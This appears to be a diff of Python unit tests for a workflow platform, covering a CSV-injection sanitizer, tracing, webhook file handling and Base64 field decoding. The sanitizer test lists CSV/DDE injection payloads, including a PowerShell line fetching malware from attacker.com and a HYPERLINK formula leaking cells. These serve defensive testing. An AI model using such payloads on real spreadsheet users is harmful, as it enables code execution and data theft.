assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1"
assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd"
def test_sanitize_safe_values(self):
"""Test that safe values are not modified."""
assert CSVSanitizer.sanitize_value("Hello World") == "Hello World"
assert CSVSanitizer.sanitize_value("123") == "123"
assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com"
assert CSVSanitizer.sanitize_value("Normal text") == "Normal text"
assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?"
def test_sanitize_safe_values_with_special_chars_in_middle(self):
"""Test that special characters in the middle are not escaped."""
assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C"
assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20"
assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com"
def test_sanitize_empty_values(self):
"""Test handling of empty values."""
assert CSVSanitizer.sanitize_value("") == ""
assert CSVSanitizer.sanitize_value(None) == ""
def test_sanitize_numeric_types(self):
"""Test handling of numeric types."""
assert CSVSanitizer.sanitize_value(123) == "123"
assert CSVSanitizer.sanitize_value(456.789) == "456.789"
assert CSVSanitizer.sanitize_value(0) == "0"
# Negative numbers should be escaped (start with -)
assert CSVSanitizer.sanitize_value(-123) == "'-123"
def test_sanitize_boolean_types(self):
"""Test handling of boolean types."""
assert CSVSanitizer.sanitize_value(True) == "True"
assert CSVSanitizer.sanitize_value(False) == "False"
def test_sanitize_dict_with_specific_fields(self):
"""Test sanitizing specific fields in a dictionary."""
data = {
"question": "=1+1",
"answer": "+cmd|'/c calc",
"safe_field": "Normal text",
"id": "12345",
}
sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"])
assert sanitized["question"] == "'=1+1"
assert sanitized["answer"] == "'+cmd|'/c calc"
assert sanitized["safe_field"] == "Normal text"
assert sanitized["id"] == "12345"
def test_sanitize_dict_all_string_fields(self):
"""Test sanitizing all string fields when no field list provided."""
data = {
"question": "=1+1",
"answer": "+calc",
"id": 123, # Not a string, should be ignored
}
sanitized = CSVSanitizer.sanitize_dict(data, None)
assert sanitized["question"] == "'=1+1"
assert sanitized["answer"] == "'+calc"
assert sanitized["id"] == 123 # Unchanged
def test_sanitize_dict_with_missing_fields(self):
"""Test that missing fields in dict don't cause errors."""
data = {"question": "=1+1"}
sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"])
assert sanitized["question"] == "'=1+1"
assert "nonexistent_field" not in sanitized
def test_sanitize_dict_creates_copy(self):
"""Test that sanitize_dict creates a copy and doesn't modify original."""
original = {"question": "=1+1", "answer": "Normal"}
sanitized = CSVSanitizer.sanitize_dict(original, ["question"])
assert original["question"] == "=1+1" # Original unchanged
assert sanitized["question"] == "'=1+1" # Copy sanitized
def test_real_world_csv_injection_payloads(self):
"""Test against real-world CSV injection attack payloads."""
# Common DDE (Dynamic Data Exchange) attack payloads
payloads = [
"=cmd|'/c calc'!A0",
"=cmd|'/c notepad'!A0",
"+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'",
"-2+3+cmd|'/c calc'",
"@SUM(1+1)*cmd|'/c calc'",
"=1+1+cmd|'/c calc'",
'=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")',
]
for payload in payloads:
result = CSVSanitizer.sanitize_value(payload)
# All should be prefixed with single quote
assert result.startswith("'"), f"Payload not sanitized: {payload}"
assert result == f"'{payload}", f"Unexpected sanitization for: {payload}"
def test_multiline_strings(self):
"""Test handling of multiline strings."""
multiline = "Line 1\nLine 2\nLine 3"
assert CSVSanitizer.sanitize_value(multiline) == multiline
multiline_with_formula = "=SUM(A1)\nLine 2"
assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}"
def test_whitespace_only_strings(self):
"""Test handling of whitespace-only strings."""
assert CSVSanitizer.sanitize_value(" ") == " "
assert CSVSanitizer.sanitize_value("\n\n") == "\n\n"
# Tab at start should be escaped
assert CSVSanitizer.sanitize_value("\t ") == "'\t "

View File

@ -0,0 +1,101 @@
"""
Shared fixtures for ObservabilityLayer tests.
"""
from unittest.mock import MagicMock, patch
import pytest
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import SimpleSpanProcessor
from opentelemetry.sdk.trace.export.in_memory_span_exporter import InMemorySpanExporter
from opentelemetry.trace import set_tracer_provider
from core.workflow.enums import NodeType
@pytest.fixture
def memory_span_exporter():
"""Provide an in-memory span exporter for testing."""
return InMemorySpanExporter()
@pytest.fixture
def tracer_provider_with_memory_exporter(memory_span_exporter):
"""Provide a TracerProvider configured with memory exporter."""
import opentelemetry.trace as trace_api
trace_api._TRACER_PROVIDER = None
trace_api._TRACER_PROVIDER_SET_ONCE._done = False
provider = TracerProvider()
processor = SimpleSpanProcessor(memory_span_exporter)
provider.add_span_processor(processor)
set_tracer_provider(provider)
yield provider
provider.force_flush()
@pytest.fixture
def mock_start_node():
"""Create a mock Start Node."""
node = MagicMock()
node.id = "test-start-node-id"
node.title = "Start Node"
node.execution_id = "test-start-execution-id"
node.node_type = NodeType.START
return node
@pytest.fixture
def mock_llm_node():
"""Create a mock LLM Node."""
node = MagicMock()
node.id = "test-llm-node-id"
node.title = "LLM Node"
node.execution_id = "test-llm-execution-id"
node.node_type = NodeType.LLM
return node
@pytest.fixture
def mock_tool_node():
"""Create a mock Tool Node with tool-specific attributes."""
from core.tools.entities.tool_entities import ToolProviderType
from core.workflow.nodes.tool.entities import ToolNodeData
node = MagicMock()
node.id = "test-tool-node-id"
node.title = "Test Tool Node"
node.execution_id = "test-tool-execution-id"
node.node_type = NodeType.TOOL
tool_data = ToolNodeData(
title="Test Tool Node",
desc=None,
provider_id="test-provider-id",
provider_type=ToolProviderType.BUILT_IN,
provider_name="test-provider",
tool_name="test-tool",
tool_label="Test Tool",
tool_configurations={},
tool_parameters={},
)
node._node_data = tool_data
return node
@pytest.fixture
def mock_is_instrument_flag_enabled_false():
"""Mock is_instrument_flag_enabled to return False."""
with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=False):
yield
@pytest.fixture
def mock_is_instrument_flag_enabled_true():
"""Mock is_instrument_flag_enabled to return True."""
with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=True):
yield

View File

@ -0,0 +1,219 @@
"""
Tests for ObservabilityLayer.
Test coverage:
- Initialization and enable/disable logic
- Node span lifecycle (start, end, error handling)
- Parser integration (default and tool-specific)
- Graph lifecycle management
- Disabled mode behavior
"""
from unittest.mock import patch
import pytest
from opentelemetry.trace import StatusCode
from core.workflow.enums import NodeType
from core.workflow.graph_engine.layers.observability import ObservabilityLayer
class TestObservabilityLayerInitialization:
"""Test ObservabilityLayer initialization logic."""
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_initialization_when_otel_enabled(self, tracer_provider_with_memory_exporter):
"""Test that layer initializes correctly when OTel is enabled."""
layer = ObservabilityLayer()
assert not layer._is_disabled
assert layer._tracer is not None
assert NodeType.TOOL in layer._parsers
assert layer._default_parser is not None
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_true")
def test_initialization_when_instrument_flag_enabled(self, tracer_provider_with_memory_exporter):
"""Test that layer enables when instrument flag is enabled."""
layer = ObservabilityLayer()
assert not layer._is_disabled
assert layer._tracer is not None
assert NodeType.TOOL in layer._parsers
assert layer._default_parser is not None
class TestObservabilityLayerNodeSpanLifecycle:
"""Test node span creation and lifecycle management."""
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_node_span_created_and_ended(
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node
):
"""Test that span is created on node start and ended on node end."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_start(mock_llm_node)
layer.on_node_run_end(mock_llm_node, None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 1
assert spans[0].name == mock_llm_node.title
assert spans[0].status.status_code == StatusCode.OK
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_node_error_recorded_in_span(
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node
):
"""Test that node execution errors are recorded in span."""
layer = ObservabilityLayer()
layer.on_graph_start()
error = ValueError("Test error")
layer.on_node_run_start(mock_llm_node)
layer.on_node_run_end(mock_llm_node, error)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 1
assert spans[0].status.status_code == StatusCode.ERROR
assert len(spans[0].events) > 0
assert any("exception" in event.name.lower() for event in spans[0].events)
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_node_end_without_start_handled_gracefully(
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node
):
"""Test that ending a node without start doesn't crash."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_end(mock_llm_node, None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 0
class TestObservabilityLayerParserIntegration:
"""Test parser integration for different node types."""
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_default_parser_used_for_regular_node(
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_start_node
):
"""Test that default parser is used for non-tool nodes."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_start(mock_start_node)
layer.on_node_run_end(mock_start_node, None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 1
attrs = spans[0].attributes
assert attrs["node.id"] == mock_start_node.id
assert attrs["node.execution_id"] == mock_start_node.execution_id
assert attrs["node.type"] == mock_start_node.node_type.value
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_tool_parser_used_for_tool_node(
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_tool_node
):
"""Test that tool parser is used for tool nodes."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_start(mock_tool_node)
layer.on_node_run_end(mock_tool_node, None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 1
attrs = spans[0].attributes
assert attrs["node.id"] == mock_tool_node.id
assert attrs["tool.provider.id"] == mock_tool_node._node_data.provider_id
assert attrs["tool.provider.type"] == mock_tool_node._node_data.provider_type.value
assert attrs["tool.name"] == mock_tool_node._node_data.tool_name
class TestObservabilityLayerGraphLifecycle:
"""Test graph lifecycle management."""
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_on_graph_start_clears_contexts(self, tracer_provider_with_memory_exporter, mock_llm_node):
"""Test that on_graph_start clears node contexts."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_start(mock_llm_node)
assert len(layer._node_contexts) == 1
layer.on_graph_start()
assert len(layer._node_contexts) == 0
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_on_graph_end_with_no_unfinished_spans(
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node
):
"""Test that on_graph_end handles normal completion."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_start(mock_llm_node)
layer.on_node_run_end(mock_llm_node, None)
layer.on_graph_end(None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 1
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_on_graph_end_with_unfinished_spans_logs_warning(
self, tracer_provider_with_memory_exporter, mock_llm_node, caplog
):
"""Test that on_graph_end logs warning for unfinished spans."""
layer = ObservabilityLayer()
layer.on_graph_start()
layer.on_node_run_start(mock_llm_node)
assert len(layer._node_contexts) == 1
layer.on_graph_end(None)
assert len(layer._node_contexts) == 0
assert "node spans were not properly ended" in caplog.text
class TestObservabilityLayerDisabledMode:
"""Test behavior when layer is disabled."""
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_disabled_mode_skips_node_start(self, memory_span_exporter, mock_start_node):
"""Test that disabled layer doesn't create spans on node start."""
layer = ObservabilityLayer()
assert layer._is_disabled
layer.on_graph_start()
layer.on_node_run_start(mock_start_node)
layer.on_node_run_end(mock_start_node, None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 0
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False)
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
def test_disabled_mode_skips_node_end(self, memory_span_exporter, mock_llm_node):
"""Test that disabled layer doesn't process node end."""
layer = ObservabilityLayer()
assert layer._is_disabled
layer.on_node_run_end(mock_llm_node, None)
spans = memory_span_exporter.get_finished_spans()
assert len(spans) == 0

View File

@ -0,0 +1,452 @@
"""
Unit tests for webhook file conversion fix.
This test verifies that webhook trigger nodes properly convert file dictionaries
to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error
when passing files to downstream LLM nodes.
"""
from unittest.mock import Mock, patch
from core.app.entities.app_invoke_entities import InvokeFrom
from core.workflow.entities.graph_init_params import GraphInitParams
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
from core.workflow.nodes.trigger_webhook.entities import (
ContentType,
Method,
WebhookBodyParameter,
WebhookData,
)
from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode
from core.workflow.runtime.graph_runtime_state import GraphRuntimeState
from core.workflow.runtime.variable_pool import VariablePool
from core.workflow.system_variable import SystemVariable
from models.enums import UserFrom
from models.workflow import WorkflowType
def create_webhook_node(
webhook_data: WebhookData,
variable_pool: VariablePool,
tenant_id: str = "test-tenant",
) -> TriggerWebhookNode:
"""Helper function to create a webhook node with proper initialization."""
node_config = {
"id": "webhook-node-1",
"data": webhook_data.model_dump(),
}
graph_init_params = GraphInitParams(
tenant_id=tenant_id,
app_id="test-app",
workflow_type=WorkflowType.WORKFLOW,
workflow_id="test-workflow",
graph_config={},
user_id="test-user",
user_from=UserFrom.ACCOUNT,
invoke_from=InvokeFrom.SERVICE_API,
call_depth=0,
)
runtime_state = GraphRuntimeState(
variable_pool=variable_pool,
start_at=0,
)
node = TriggerWebhookNode(
id="webhook-node-1",
config=node_config,
graph_init_params=graph_init_params,
graph_runtime_state=runtime_state,
)
# Attach a lightweight app_config onto runtime state for tenant lookups
runtime_state.app_config = Mock()
runtime_state.app_config.tenant_id = tenant_id
# Provide compatibility alias expected by node implementation
# Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests
node.node_id = node.id
return node
def create_test_file_dict(
filename: str = "test.jpg",
file_type: str = "image",
transfer_method: str = "local_file",
) -> dict:
"""Create a test file dictionary as it would come from webhook service."""
return {
"id": "file-123",
"tenant_id": "test-tenant",
"type": file_type,
"filename": filename,
"extension": ".jpg",
"mime_type": "image/jpeg",
"transfer_method": transfer_method,
"related_id": "related-123",
"storage_key": "storage-key-123",
"size": 1024,
"url": "https://example.com/test.jpg",
"created_at": 1234567890,
"used_at": None,
"hash": "file-hash-123",
}
def test_webhook_node_file_conversion_to_file_variable():
"""Test that webhook node converts file dictionaries to FileVariable objects."""
# Create test file dictionary (as it comes from webhook service)
file_dict = create_test_file_dict("uploaded_image.jpg")
data = WebhookData(
title="Test Webhook with File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="image_upload", type="file", required=True),
WebhookBodyParameter(name="message", type="string", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {"message": "Test message"},
"files": {
"image_upload": file_dict,
},
}
},
)
node = create_webhook_node(data, variable_pool)
# Mock the file factory and variable factory
with (
patch("factories.file_factory.build_from_mapping") as mock_file_factory,
patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
):
# Setup mocks
mock_file_obj = Mock()
mock_file_obj.to_dict.return_value = file_dict
mock_file_factory.return_value = mock_file_obj
mock_segment = Mock()
mock_segment.value = mock_file_obj
mock_segment_factory.return_value = mock_segment
mock_file_var_instance = Mock()
mock_file_variable.return_value = mock_file_var_instance
# Run the node
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify file factory was called with correct parameters
mock_file_factory.assert_called_once_with(
mapping=file_dict,
tenant_id="test-tenant",
)
# Verify segment factory was called to create FileSegment
mock_segment_factory.assert_called_once()
# Verify FileVariable was created with correct parameters
mock_file_variable.assert_called_once()
call_args = mock_file_variable.call_args[1]
assert call_args["name"] == "image_upload"
# value should be whatever build_segment_with_type.value returned
assert call_args["value"] == mock_segment.value
assert call_args["selector"] == ["webhook-node-1", "image_upload"]
# Verify output contains the FileVariable, not the original dict
assert result.outputs["image_upload"] == mock_file_var_instance
assert result.outputs["message"] == "Test message"
def test_webhook_node_file_conversion_with_missing_files():
"""Test webhook node file conversion with missing file parameter."""
data = WebhookData(
title="Test Webhook with Missing File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="missing_file", type="file", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {}, # No files
}
},
)
node = create_webhook_node(data, variable_pool)
# Run the node without patches (should handle None case gracefully)
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify missing file parameter is None
assert result.outputs["_webhook_raw"]["files"] == {}
def test_webhook_node_file_conversion_with_none_file():
"""Test webhook node file conversion with None file value."""
data = WebhookData(
title="Test Webhook with None File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="none_file", type="file", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"file": None,
},
}
},
)
node = create_webhook_node(data, variable_pool)
# Run the node without patches (should handle None case gracefully)
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify None file parameter is None
assert result.outputs["_webhook_raw"]["files"]["file"] is None
def test_webhook_node_file_conversion_with_non_dict_file():
"""Test webhook node file conversion with non-dict file value."""
data = WebhookData(
title="Test Webhook with Non-Dict File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="wrong_type", type="file", required=True),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"file": "not_a_dict", # Wrapped to match node expectation
},
}
},
)
node = create_webhook_node(data, variable_pool)
# Run the node without patches (should handle non-dict case gracefully)
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify fallback to original (wrapped) mapping
assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict"
def test_webhook_node_file_conversion_mixed_parameters():
"""Test webhook node with mixed parameter types including files."""
file_dict = create_test_file_dict("mixed_test.jpg")
data = WebhookData(
title="Test Webhook Mixed Parameters",
method=Method.POST,
content_type=ContentType.FORM_DATA,
headers=[],
params=[],
body=[
WebhookBodyParameter(name="text_param", type="string", required=True),
WebhookBodyParameter(name="number_param", type="number", required=False),
WebhookBodyParameter(name="file_param", type="file", required=True),
WebhookBodyParameter(name="bool_param", type="boolean", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {
"text_param": "Hello World",
"number_param": 42,
"bool_param": True,
},
"files": {
"file_param": file_dict,
},
}
},
)
node = create_webhook_node(data, variable_pool)
with (
patch("factories.file_factory.build_from_mapping") as mock_file_factory,
patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
):
# Setup mocks for file
mock_file_obj = Mock()
mock_file_factory.return_value = mock_file_obj
mock_segment = Mock()
mock_segment.value = mock_file_obj
mock_segment_factory.return_value = mock_segment
mock_file_var = Mock()
mock_file_variable.return_value = mock_file_var
# Run the node
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify all parameters are present
assert result.outputs["text_param"] == "Hello World"
assert result.outputs["number_param"] == 42
assert result.outputs["bool_param"] is True
assert result.outputs["file_param"] == mock_file_var
# Verify file conversion was called
mock_file_factory.assert_called_once_with(
mapping=file_dict,
tenant_id="test-tenant",
)
def test_webhook_node_different_file_types():
"""Test webhook node file conversion with different file types."""
image_dict = create_test_file_dict("image.jpg", "image")
data = WebhookData(
title="Test Webhook Different File Types",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="image", type="file", required=True),
WebhookBodyParameter(name="document", type="file", required=True),
WebhookBodyParameter(name="video", type="file", required=True),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"image": image_dict,
"document": create_test_file_dict("document.pdf", "document"),
"video": create_test_file_dict("video.mp4", "video"),
},
}
},
)
node = create_webhook_node(data, variable_pool)
with (
patch("factories.file_factory.build_from_mapping") as mock_file_factory,
patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
):
# Setup mocks for all files
mock_file_objs = [Mock() for _ in range(3)]
mock_segments = [Mock() for _ in range(3)]
mock_file_vars = [Mock() for _ in range(3)]
# Map each segment.value to its corresponding mock file obj
for seg, f in zip(mock_segments, mock_file_objs):
seg.value = f
mock_file_factory.side_effect = mock_file_objs
mock_segment_factory.side_effect = mock_segments
mock_file_variable.side_effect = mock_file_vars
# Run the node
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify all file types were converted
assert mock_file_factory.call_count == 3
assert result.outputs["image"] == mock_file_vars[0]
assert result.outputs["document"] == mock_file_vars[1]
assert result.outputs["video"] == mock_file_vars[2]
def test_webhook_node_file_conversion_with_non_dict_wrapper():
"""Test webhook node file conversion when the file wrapper is not a dict."""
data = WebhookData(
title="Test Webhook with Non-dict File Wrapper",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"file": "just a string",
},
}
},
)
node = create_webhook_node(data, variable_pool)
result = node._run()
# Verify successful execution (should not crash)
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify fallback to original value
assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string"

View File

@ -1,8 +1,10 @@
from unittest.mock import patch
import pytest
from core.app.entities.app_invoke_entities import InvokeFrom
from core.file import File, FileTransferMethod, FileType
from core.variables import StringVariable
from core.variables import FileVariable, StringVariable
from core.workflow.entities.graph_init_params import GraphInitParams
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
from core.workflow.nodes.trigger_webhook.entities import (
@ -27,26 +29,34 @@ def create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool)
"data": webhook_data.model_dump(),
}
graph_init_params = GraphInitParams(
tenant_id="1",
app_id="1",
workflow_type=WorkflowType.WORKFLOW,
workflow_id="1",
graph_config={},
user_id="1",
user_from=UserFrom.ACCOUNT,
invoke_from=InvokeFrom.SERVICE_API,
call_depth=0,
)
runtime_state = GraphRuntimeState(
variable_pool=variable_pool,
start_at=0,
)
node = TriggerWebhookNode(
id="1",
config=node_config,
graph_init_params=GraphInitParams(
tenant_id="1",
app_id="1",
workflow_type=WorkflowType.WORKFLOW,
workflow_id="1",
graph_config={},
user_id="1",
user_from=UserFrom.ACCOUNT,
invoke_from=InvokeFrom.SERVICE_API,
call_depth=0,
),
graph_runtime_state=GraphRuntimeState(
variable_pool=variable_pool,
start_at=0,
),
graph_init_params=graph_init_params,
graph_runtime_state=runtime_state,
)
# Provide tenant_id for conversion path
runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})()
# Compatibility alias for some nodes referencing `self.node_id`
node.node_id = node.id
return node
@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params():
"query_params": {},
"body": {},
"files": {
"upload": file1,
"document": file2,
"upload": file1.to_dict(),
"document": file2.to_dict(),
},
}
},
)
node = create_webhook_node(data, variable_pool)
result = node._run()
# Mock the file factory to avoid DB-dependent validation on upload_file_id
with patch("factories.file_factory.build_from_mapping") as mock_file_factory:
def _to_file(mapping, tenant_id, config=None, strict_type_validation=False):
return File.model_validate(mapping)
mock_file_factory.side_effect = _to_file
result = node._run()
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
assert result.outputs["upload"] == file1
assert result.outputs["document"] == file2
assert result.outputs["missing_file"] is None
assert isinstance(result.outputs["upload"], FileVariable)
assert isinstance(result.outputs["document"], FileVariable)
assert result.outputs["upload"].value.filename == "image.jpg"
def test_webhook_node_run_mixed_parameters():
@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters():
"headers": {"Authorization": "Bearer token"},
"query_params": {"version": "v1"},
"body": {"message": "Test message"},
"files": {"upload": file_obj},
"files": {"upload": file_obj.to_dict()},
}
},
)
node = create_webhook_node(data, variable_pool)
result = node._run()
# Mock the file factory to avoid DB-dependent validation on upload_file_id
with patch("factories.file_factory.build_from_mapping") as mock_file_factory:
def _to_file(mapping, tenant_id, config=None, strict_type_validation=False):
return File.model_validate(mapping)
mock_file_factory.side_effect = _to_file
result = node._run()
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
assert result.outputs["Authorization"] == "Bearer token"
assert result.outputs["version"] == "v1"
assert result.outputs["message"] == "Test message"
assert result.outputs["upload"] == file_obj
assert isinstance(result.outputs["upload"], FileVariable)
assert result.outputs["upload"].value.filename == "test.jpg"
assert "_webhook_raw" in result.outputs

View File

@ -1,3 +1,5 @@
from types import SimpleNamespace
import pytest
from core.file.enums import FileType
@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable
from core.workflow.workflow_entry import WorkflowEntry
@pytest.fixture(autouse=True)
def _mock_ssrf_head(monkeypatch):
"""Avoid any real network requests during tests.
file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect
remote files. We stub it to return a minimal response object with
headers so filename/mime/size can be derived deterministically.
"""
def fake_head(url, *args, **kwargs):
# choose a content-type by file suffix for determinism
if url.endswith(".pdf"):
ctype = "application/pdf"
elif url.endswith(".jpg") or url.endswith(".jpeg"):
ctype = "image/jpeg"
elif url.endswith(".png"):
ctype = "image/png"
else:
ctype = "application/octet-stream"
filename = url.split("/")[-1] or "file.bin"
headers = {
"Content-Type": ctype,
"Content-Disposition": f'attachment; filename="{filename}"',
"Content-Length": "12345",
}
return SimpleNamespace(status_code=200, headers=headers)
monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head)
class TestWorkflowEntry:
"""Test WorkflowEntry class methods."""

View File

@ -0,0 +1,150 @@
"""
Unit tests for field encoding/decoding utilities.
These tests verify Base64 encoding/decoding functionality and
proper error handling and fallback behavior.
"""
import base64
from libs.encryption import FieldEncryption
class TestDecodeField:
"""Test cases for field decoding functionality."""
def test_decode_valid_base64(self):
"""Test decoding a valid Base64 encoded string."""
plaintext = "password123"
encoded = base64.b64encode(plaintext.encode("utf-8")).decode()
result = FieldEncryption.decrypt_field(encoded)
assert result == plaintext
def test_decode_non_base64_returns_none(self):
"""Test that non-base64 input returns None."""
non_base64 = "plain-password-!@#"
result = FieldEncryption.decrypt_field(non_base64)
# Should return None (decoding failed)
assert result is None
def test_decode_unicode_text(self):
"""Test decoding Base64 encoded Unicode text."""
plaintext = "密码Test123"
encoded = base64.b64encode(plaintext.encode("utf-8")).decode()
result = FieldEncryption.decrypt_field(encoded)
assert result == plaintext
def test_decode_empty_string(self):
"""Test decoding an empty string returns empty string."""
result = FieldEncryption.decrypt_field("")
# Empty string base64 decodes to empty string
assert result == ""
def test_decode_special_characters(self):
"""Test decoding with special characters."""
plaintext = "P@ssw0rd!#$%^&*()"
encoded = base64.b64encode(plaintext.encode("utf-8")).decode()
result = FieldEncryption.decrypt_field(encoded)
assert result == plaintext
class TestDecodePassword:
"""Test cases for password decoding."""
def test_decode_password_base64(self):
"""Test decoding a Base64 encoded password."""
password = "SecureP@ssw0rd!"
encoded = base64.b64encode(password.encode("utf-8")).decode()
result = FieldEncryption.decrypt_password(encoded)
assert result == password
def test_decode_password_invalid_returns_none(self):
"""Test that invalid base64 passwords return None."""
invalid = "PlainPassword!@#"
result = FieldEncryption.decrypt_password(invalid)
# Should return None (decoding failed)
assert result is None
class TestDecodeVerificationCode:
"""Test cases for verification code decoding."""
def test_decode_code_base64(self):
"""Test decoding a Base64 encoded verification code."""
code = "789012"
encoded = base64.b64encode(code.encode("utf-8")).decode()
result = FieldEncryption.decrypt_verification_code(encoded)
assert result == code
